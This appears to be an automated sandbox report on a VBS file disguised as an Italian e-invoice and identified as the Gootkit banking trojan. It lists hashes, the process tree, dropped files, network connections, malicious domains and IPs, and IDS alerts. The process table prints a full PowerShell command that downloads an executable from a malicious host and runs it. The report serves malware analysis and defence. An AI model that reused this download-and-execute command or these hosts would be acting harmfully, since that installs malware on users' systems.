File name: | _Nuovi Fattura elettronica 2018__85.vbs |
Full analysis: | https://app.any.run/tasks/58ddf88f-e025-4ef3-ae12-b63ac7f60159 |
Verdict: | Malicious activity |
Threats: | Gootkit is an advanced banking trojan. It is extremely good at evading detection and has an incredibly effective persistence mechanism, making it a dangerous malware that researchers and organizations should be aware of. |
Analysis date: | December 14, 2018, 12:21:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | B1964C6CF56F1529D255045DAF47BBF8 |
SHA1: | 111D99AAEE4714CB13EB9B8208DE1E94481A0913 |
SHA256: | 3EF1808D71F8D4CE398EF531FB16B3EACAF2FBFCCAF8E0D701209B1F94CA567C |
SSDEEP: | 3072:UzhhGSxg2BcZsKv5sDZjTbL4MEe9r7a9t598HMmrqIzOPDogrCqH18oi:UzhZxg2BcyKv+J3L4ME8r7a9T9ZmrqIz |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2276 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Nuovi Fattura elettronica 2018__85.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2264 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ufiyzdvfg = New-Object -ComObject Msxml2.XMLHTTP; $awyheifv = New-Object -ComObject ADODB.Stream; $sduvbjvb = $env:temp + '\tv_x64x32.exe';$ufiyzdvfg.open('GET', 'http://amd.coiten.com//upll?92818', $false);$ufiyzdvfg.send(); if($ufiyzdvfg.Status -eq "200"){$awyheifv.open();$awyheifv.type = 1;$awyheifv.write($ufiyzdvfg.responseBody);$awyheifv.position = 0;$awyheifv.savetofile($sduvbjvb);$awyheifv.close();} Start-Process $sduvbjvb; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2892 | "C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe" | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM | ||||
552 | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | tv_x64x32.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ALY6L7CWLR7L1DQFGMOS.temp | — | |
MD5:— | SHA256:— | |||
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:66C674FAF5938727AFF5D90EC5445F23 | SHA256:7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272 | |||
2892 | tv_x64x32.exe | C:\Users\admin\AppData\Local\Temp\tv_x64x32.inf | ini | |
MD5:285F9CFD07DE99934A418B86B08F16EB | SHA256:FFD8E3E5F1D075D4E34C877C8CA2EC12B7277231D08E4D02F476DCFCC1149B6A | |||
552 | tv_x64x32.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3896776584-4254864009-862391680-1000\578c3c4f2234dc4bd77dc4898cd130e8_eeeb5d54-7880-42a7-b542-739bbc26cf4b | binary | |
MD5:048DFB0DB1A17E5A42297F75919751EA | SHA256:C5E610A2C0C9B6771ACAD79DF5226EB6622BC604EE051D5C0F68CEF442F1EC09 | |||
2264 | powershell.exe | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | executable | |
MD5:A05CEB1E09CA311F7240963E262004AE | SHA256:C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42 | |||
2264 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\upll[1].txt | executable | |
MD5:A05CEB1E09CA311F7240963E262004AE | SHA256:C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42 | |||
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFa788a.TMP | binary | |
MD5:66C674FAF5938727AFF5D90EC5445F23 | SHA256:7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
552 | tv_x64x32.exe | GET | 200 | 109.230.199.169:443 | https://drk.fm604.com/rbody32 | SE | binary | 3.75 Mb | malicious |
552 | tv_x64x32.exe | GET | 200 | 109.230.199.169:443 | https://drk.fm604.com/rbody320 | SE | text | 4 b | malicious |
2264 | powershell.exe | GET | 200 | 31.214.157.31:80 | http://amd.coiten.com//upll?92818 | NL | executable | 233 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
552 | tv_x64x32.exe | 109.230.199.169:443 | drk.fm604.com | Portlane AB | SE | malicious |
2264 | powershell.exe | 31.214.157.31:80 | amd.coiten.com | easystores GmbH | NL | malicious |
Domain | IP | Reputation |
---|---|---|
amd.coiten.com |
| malicious |
drk.fm604.com |
| malicious |
it.sunballast.de |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2264 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2264 | powershell.exe | A Network Trojan was detected | ET TROJAN Possible Windows executable sent when remote host claims to send a Text File |
552 | tv_x64x32.exe | Generic Protocol Command Decode | SURICATA STREAM excessive retransmissions |
Process | Message |
---|---|
tv_x64x32.exe | MP3 file corrupted |
tv_x64x32.exe | WMA 0 |
tv_x64x32.exe | WMA 3 |
tv_x64x32.exe | 552:C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz Ignition....
|
tv_x64x32.exe | JS : RUN : tv_x64x32.exe, ver : 25.10.18.1117
|
tv_x64x32.exe | OGG 0 |